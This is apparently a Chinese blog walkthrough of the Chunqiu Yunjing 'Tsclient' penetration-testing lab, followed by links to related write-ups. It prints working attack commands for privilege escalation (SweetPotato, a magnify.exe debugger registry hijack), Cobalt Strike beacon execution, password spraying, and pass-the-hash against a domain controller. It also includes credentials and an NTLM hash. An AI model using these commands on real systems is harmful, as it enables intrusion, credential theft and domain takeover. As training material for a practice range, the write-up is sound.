【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记

于 2024-08-22 04:40:27 发布
阅读量674 收藏 10
点赞数 10
文章标签: 春秋云镜 内网渗透 渗透 Tsclient 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141406072
版权

目录

①fscan扫mssql账密,MDUT拿shell

②sweetpotato提权,cs拿shell

③John用户进程注入,读共享文件

④fscan扫内网,frp内网穿透

⑤喷洒密码,修改密码

⑥RDP远程桌面连接

⑦映像劫持提权

⑧不出网转发上线CS

⑨PTH

①fscan扫mssql账密,MDUT拿shell

GitHub - SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools 

 

②sweetpotato提权,cs拿shell

sqlsever权限很低

上传SweetPotato提权 

 

C:/Users/Public/sweetpotato.exe -a "whoami"

 再执行上传的cs马

C:/Users/Public/sweetpotato.exe -a "C:/Users/Public/beacon_x64.exe"

成功上线 

读到flag1 

shell type C:\Users\Administrator\flag\flag01.txt

③John用户进程注入,读共享文件

 查看在线用户

shell quser || qwinst

有在线用户可以用CS注入进程上线 

Cobalt Strike进程注入-CSDN博客 

 

成功上线John 

 

用John查看共享资源 

shell net use

 列目录读文件

shell dir \\tsclient\c

 

shell type \\tsclient\c\credential.txt

拿到一套账密,并提示打映像劫持

④fscan扫内网,frp内网穿透

上传fscan和frp相关

 

frp相关操作可以参考上篇文章:

【内网渗透】最保姆级的春秋云镜initial打靶笔记-CSDN博客

 

⑤喷洒密码,修改密码

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

提示STATUS_PASSWORD_EXPIRED也就是密码过期了,需要使用smbpasswd进行修改密码

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

proxychains python smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Z3r4y@401'

 

⑥RDP远程桌面连接

测出来只有172.22.8.46可以连接

proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Z3r4y@401' -r disk:share=/home/kali/Desktop/tmp

 

⑦映像劫持提权

致敬经典,选择用放大镜提权

映像劫持的几种利用方式 - FreeBuf网络安全行业门户

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

开始->锁定 

 点击放大镜

成功提权 

读到flag2 

type C:\Users\Administrator\flag\flag02.txt

 

⑧不出网转发上线CS

不出网主机上线到CobaltStrike的方式_cs转发上线模块-CSDN博客

172.22.8.46不出网,用172.22.8.18转发上线CS 

 

 

 

 用放大镜执行CS马

C:\Users\Aldrich\Desktop\beacon.exe

成功以SYSTEM上线 

 

 

⑨PTH

查看域管成员

shell net group "domain admins" /domain

抓取密码 

logonpasswords

用PTH打DC,读到flag3

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 374e0bdc02e3dbac0bb75c921560a337 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"

Z3r4y
关注
Ichunqiu云境 —— Tsclient Writeup
WUfagg的博客
12-12 796
MSSQL,Privilege Escalation,Kerberos,域渗透,RDP
tsclient:寒意打字稿客户端
04-14
tsclient 安装 yarn add @getchill.app/tsclient 用法 import { Credentials , rpcService , RPCService , certPath , RPCError } from '@getchill.app/tsclient' export const creds : Credentials = new ...
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2847
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
春秋云镜-Tsclient-Writeup
热门推荐
qq_35607078的博客
07-12 1万+
春秋云镜-Tsclient-Writeup
靶场练习--春秋云境-Tsclient
NoooEmotion的博客
01-28 2301
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
i春秋云镜Tsclient
weixin_65550121的博客
12-15 1110
因为它在远程连接我们的时候把磁盘也挂载过来了,这里由于我们不能让对面那台主机重启所以我们不能通过写启动项的方式让他上线但我们在对方的C盘发现了一个用户以及提示的信息接下来就是进一步的操作这里先把权限切换到John用户。因为对方远程登录的是这个桌面这里切忌一定不要远程上去你一旦远程上去 对方的连接就会断开 他的C盘也会断开所以你收集不到他的磁盘信息了迁移到John的进程上去。我们可以发现这里面都是windows的机器,我们先提权。我们发现是权限是mssql权限,所以我们需要提权。
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 853
Wp-春秋云镜Tsclient专业徽章Flag01
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
02-03
**TPM:TSClient LEGACY软件包管理器详解** TSClient LEGACY的TPM,全称为ThinClient Package Manager,是一款专为TSClient LEGACY ThinClient操作系统设计的软件包管理器。这个工具的主要职责是简化软件的安装、...
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
02-04
TPM2,全称为TSClient LEGACY的软件包管理器的第二版本,是专为TSClient LEGACY ThinClient操作系统设计的一个高效且强大的工具。这个软件包管理器是完全使用C++编程语言编写的,体现了C++在系统编程中的应用优势...
Terminal Server Client [tsclient]:项目已被https://sourceforge.net/projects/remmina/取代-开源
05-14
终端服务器客户端[tsclient]是rdesktop和其他远程桌面工具的GTK2前端。 该项目已被Remmina取代-https://sourceforge.net/projects/remmina/
SweetPotato:SweetPotato修改版,用于webshel​​l下执行命令
03-19
甜土豆 感谢@zcgonvh和@RcoIl两位师傅的耐心指导
SweetPotato:从Windows 7到Windows 10 Server 2019的本地服务到SYSTEM特权升
03-19
甜土豆 从服务帐户到SYSTEM的各种本机Windows特权升技术的集合 SweetPotato by @_EthicalChaos_ Orignal RottenPotato code and exploit by @foxglovesec Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery PrintSpoofer discovery and original exploit by @itm4n -c, --clsid=VALUE CLSID (default BITS: 4991D34B-80A1-4291-83B6- 3328366B9097) -m, --method=
内网渗透春秋云镜 Tsclient WP
Sapphire037的博客
05-15 1183
mssql连接和攻击、windows提权、令牌窃取、镜像劫持。
渗透测试】Tsclient-春秋云镜 极致的工具化打法!
m0_74272345的博客
10-03 770
这个靶场是纯Windows靶场,有很多难点,也有很多可扩展学习的地方。fscan爆出MSSQL弱口令,通过MDUT工具拿下WIN-WEBRDP贯穿整个内网渗透的思路,是这个靶场的核心john用户用tsclient挂载C盘到WIN-WEB,把域内主机用户密码给泄露了,可以做密码喷洒攻击(密码碰撞)映像劫持提权:放大镜这个是直接拿WP的用,可以扩展学习impacket工具包的使用作为一个学习渗透从B站红队笔记开始的人,春秋云镜靶场很多的使用工具让人有点略微不适应。
春秋云镜-【仿真场景】Tsclient writeup
渗透测试研究中心
03-07 488
0x1 InfoTag:MSSQL,Privilege Escalation,Kerberos,域渗透,RDP靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU0x2 ReconTarget external ip47.92.82.196nmapMSSQL 弱口令爆破,爆破出有效凭据,权限为服务账户权限(MSSQLSE...
春秋云镜 ----Tsclient(kking)
m0_60742333的博客
11-02 675
工具:Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar。在 cmd窗口中输入查找flag 03 (若提示密码不正确则返回上一步查看hash值是否传递正确)通过复制粘贴的形式将mimikatz从本地上传到远程,并以管理员身份运行。kali里太卡了,转用SocksCap64-4.7配代理远程连接。密码过期了,使用kali直接连接远程桌面修改密码。获取后进行hash传递。发现mssql弱口令漏洞,使用工具连接。
春秋云境Tsclient-WP【一遍过】
weixin_63576152的博客
10-05 336
quser查看计算机上的用户会话信息(quser命令在windows server和windows的某些专业版才适用)上传mimikatz,用shift后门启动管理员权限的cmd,运行mimikatz,执行命令。服务器管理器-->管理-->添加角色1 和功能-->功能-->勾选.net3.5进行安装。里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)运行完会跳出一个命令框,直接通过命令行可以访问域控的文件。查看权限,当前用户是普通用户,没有管理员权限。或者用下面的命令添加用户test,远程登录。
windows提权之本地溢出漏洞提权
m0_62207170的博客
03-17 978
windows提权之本地溢出漏洞提权
\\TSCLIENT\D\ZP20.XLS,是什么意思
最新发布
03-20
很抱歉,根据你提供的信息,我无法准确回答你关于"\\TSCLIENT\D\ZP20.XLS"的问题。"\\TSCLIENT\D\ZP20.XLS"看起来像是一个文件路径,但我无法确定具体是什么文件或者它的含义。如果你能提供更多的背景信息或者问题的上下文,我将尽力帮助你解答。以下是一些可能有助于你的问题: 1. "TSCLIENT"是什么意思? 2. "D"代表什么? 3. "ZP20.XLS"是什么类型的文件? 4. 你需要关于该文件的哪方面的信息? 请提供更多详细信息,以便我能够更好地回答你的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值